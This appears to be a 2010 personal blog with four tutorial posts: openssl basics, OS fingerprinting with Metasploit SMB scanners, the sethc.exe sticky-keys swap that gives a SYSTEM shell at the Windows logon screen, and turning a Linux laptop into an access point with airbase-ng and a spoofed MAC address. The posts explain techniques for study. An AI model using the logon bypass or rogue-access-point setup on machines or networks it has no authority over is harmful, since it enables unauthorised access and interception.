Thursday, March 25, 2010

Getting started with openssl

According to its manpage, it is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security network protocols and related cryptography standards required by them. It is indeed a command line tool and allows you to create RSA and DSA keys, x.509 certificates, calculation of message digests, encryption and decryption of files with optional ciphers, etc. As there are so many ways to use this tool, i will show some of its basic usages that one may find useful.

# openssl -h // for command switches
# man openssl //Documentation of the tool
# openssl list-standard-commands // list standard commands. Doesn't say what they do so you are better off using "man openssl"
# openssl list-cipher-commands //list different symmetric ciphers you can use for encrytpion
# openssl list-message-digest-commands //lists different hashing algorithms you can use for data integrity checking

# echo "password" | openssl md5 //creates the md5 hash for the string password
# echo "password" | openssl enc -md5 //does the same thing as previous example
# openssl bf -in myfile.txt -out myfile.txt.enc //encrypts the file "myfile.txt" using the blowfish cipher 'bf' to a new file 'myfile.txt.enc'. You can now delete the old file

# openssl enc -bf -in myfile.txt -out myfile.txt.enc //encrypts the file "myfile.txt" using the blowfish cipher 'bf' to a new file 'myfile.txt.enc'. Equivallent to the above command.

# openssl enc -bf -d -in myfile.txt.enc -out myfile.txt //decrypts the file "myfile.txt.enc" using the blowfish cipher 'bf' and outputs the decrypted file to a new filename 'myfile.txt'.

Using Public Key Cryptography

# openssl genrsa -out private.key //Generates private key

# openssl rsa -pubout -in private.key -out public.key //generates public key from the private key

# openssl rsautl -encrypt -inkey public.key -pubin -in test.txt -out //encrypt a file with public key. Note that you are limited to small file sizes

# openssl rsautl -decrypt -inkey private.key -in -out test.txt //decrypts the file with the private key

Monday, March 22, 2010

Using Metasploit for OS fingerprinting

Metasploit is primarilly a framework for developing and testing exploits. It comes with a suite of supporting tools that aid in exploit development, including port scanners. We can use one of these scanners to scan for open ports and fingerprint Windows services as well as the OS type. Using the following commands we can quickly fingerprint the SMB port of 445 to determine the OS version.

# ./msfconsole //launches the framework

msf> use auxiliary/scanner/portscan/syn
msf auxiliary(syn)>show options
set the necessary options, using port 445 as the port
msf auxiliary(smb version)>run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then based on your results, if port 445 is open on the host, use
msf> use auxiliary/scanner/smb/smb_version
msf auxiliary(smb version)>show options
set the rhosts option then run the auxiliary module:
msf auxiliary(smb version)>run
[*] is runnnin Windows XP Service Pack 3(Language: English) (name:PC1) (domain:PC1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, withing a few simple metasploit commands you can determine the OS type of a remote system. This however uses the SMB port of 445 and is a requirement for this experiment. Then are other ways to determine this information but this is one of the most reliable methods.

Thursday, March 18, 2010

Physical access == priveledge escalation pt 2

This is another method that i found out recently that allows one to obtain a command prompt at the logon screen with system priveleges. If you recall from one of my previous post, i did this same trick using the utilman.exe replacement method. It turns out that there is another exe that we can replace as well to accomplish this same trick, called "sethc.exe". You replace this with cmd.exe then reboot your computer. When you encounter the logon screen, hit the shift key five times and you should now be greeted with a command prompt with system priveleges.

Quick notes:
  1. Load up any linix OS
  2. Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
  3. Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
  4. Rename sethc.exe : "mv sethc.exe sethc.bak"
  5. Copy cmd.exe to the name of sethc.exe: "cp cmd.exe sethc.exe"
  6. Sync the changes and flush buffers, Optional but safe: "Sync"
  7. Reboot Comp: "reboot"
  8. When on the logon screen hit the shift key 5 times and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group

References/Good Reading:

Tuesday, March 9, 2010

Turning your laptop into a wireless AP

I'm just gonna go over some simple code and tools that you can use to transform your laptop running linux into a wireless access point where wireless clients can connect to. The programs that i will be using are airmon-ng, airbase-ng, dhcpd-server and dnsmasq just to name a few. Other utilities will be used in my example here but they are mostly complementary tools that may not be deemed necessary.

First we create a virual interface using airmon-ng
#airmon-ng start wlan0 //this uses the wireless card as a prototype so to speak to create a virutal interface (mon0) that can operate in what is known as monitor mode

We then will put our new virtual interface down so we can change our mac address to something other than the original address.
# ifconfig mon0 down //pull interface down
# macchanger -m 00:00:F0:0D:00:00 mon0 //changes the mac address originally at mon0
# ifconfig mon0 up //brings the interface back up

We then will use the airbase-ng program to create yet another virtual interface that would have the ability to act as an AP. This interface operates in what is known as Master mode, where it has the ability to act as a synchronisation master for clients. I usually would use the xterm command to create a new window to execute the airbase-ng program as its output can be very useful as it will show the current clients attempting to authenticate and associate with your machine.

# xterm -bg red -bd blue -fg white -hold -geometry 96x25+0+0 -e airbase-ng -e "GoodAP" -c 6 -v mon0 & //uses mon0 interface to create a new virutual interface (at0 by default). Xterm allows the output of the airebase-ng command to be displayed in a new x-based window. Airbase-ng '-e' gives the ssid name, '-c' gives the channel number to broadcast on and -v is for more verbose output.

A new virtual interface is now available, at0. This is the interface thats gonna respond to wireless client probe requests. At this stage it needs to be configured and given and ip address.

# ifconfig at0 netmask up
# ifconfig at0 mtu 1400

Our access point with the name "GoodAP" should now be broadcasting and clients would be able see it. However we are not complete in setting up our AP. Our clients need to be able to get a IP address via dhcp server and be able to resolve dns requests via a dnsserver. You would need a dhcp.conf config file. You can find many examples on the web of simple configs.



option domain-name-servers;
default-lease-time 360;
max-lease-time 720;

subnet netmask {
option subnet-mask;
option routers;
option broadcast-address;
option domain-name-servers;

Issuing the next two commands will take care of some permission issues when running the dhcpd server. Dhcpd server is run under the dhcpd user account, which do not have write permissions for the directory /var/run. To overcome this issue, simple do the following:

touch /var/run/
chown dhcpd:dhcpd /var/run/

By issuing the above, you are now giving the server permissions to have the relevant access to its PID file that it attempts to create and write to.

# chown dhcpd {dhcpd.conf,dhcpd.leases}
# chgrp dhcpd {dhcpd.conf,dhcpd.leases}
Remember, you may have to do the same for the parent folder as well from which the script or command is being ran

Start the dhcpd service:
# dhcpd3 -cf dhcpd.conf -lf dhcpd.leases -f at0
Note: You may get some errors relating to permissions and writing to the lease file. Simply change the user and group ownership of your leases file. You may also have to change the permissions of the directory as well. I made a directory specifically for my config and lease files and had to change the ownership permissions to the file and directory for everything to work fine.

Since the dhcpd.conf file sets the clients up to use our ip as the DNS server, we can set up a simple DNS server to handle the requests. I used dnsmasq (apt-get install dnsmasq). It works straight off a fresh install with no configuration. It uses the its local/etc/resolv.conf to forward the requests to. So basically, it listens on port 53 and forwards the request to the servers listed in /etc/resolve.conf. It may also cache these lookups as well.

Start the simple dns cacheing server.
# dnsmasq restart

You would need to set your kernel to forward mode to forward all packets not destined for it
# echo 1 > /proc/sys/net/ipv4/ip_forward

The last thing we really need to do here is to set IP masqerading. It allows the synchronization between two networks with different IP address, like a NAT router.

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

With this setup, airbase-ng will set up the AP interface for you, its your duty to start the necessary dhcp and dns servers to automate client setups. Forwarding withing the kernel is crucial so the clients wont be succeptable to denial of service by the kernel and an all important ip masquerade command for synchronization between the wireless nic and ethernet nic on the laptop.

The above is a basic overview of how this is done and may require an above average understanding of linux and servers. These are the basic commands that should get you up and going, although on your machine, there may be some things that need tweaking. Remember, everymachine is different and what might work for me may not work for you without little modifications on your system. Its very important to know what you are doing and what to expect from these tools as this knowledge would prove to be very valuable when you have to troubleshoot problems.